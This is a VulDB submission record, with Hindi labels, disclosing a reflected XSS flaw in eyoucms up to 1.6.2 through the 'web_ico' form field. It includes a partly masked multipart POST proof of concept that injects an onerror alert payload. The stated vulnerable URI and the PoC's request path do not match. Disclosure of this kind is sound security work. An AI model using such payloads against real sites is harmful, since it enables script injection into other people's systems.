| शीर्षक | eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability |
|---|
| विवरण | eyoucms up to 1.6.2 has a xss vulnerability
The vulnerable uri is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4
and the vulnerable multipart parameter is name="web_ico"
POC below:
POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"
<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--
see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md |
|---|
| स्रोत | ⚠️ https://www.eyoucms.com/ |
|---|
| उपयोगकर्ता | WWesleywww (UID 43117) |
|---|
| सबमिशन | 07/04/2023 03:36 PM (3 साल पहले) |
|---|
| संयम | 14/04/2023 10:36 AM (7 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 225943 [EyouCms तक 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico क्रॉस साइट स्क्रिप्टिंग] |
|---|
| अंक | 17 |
|---|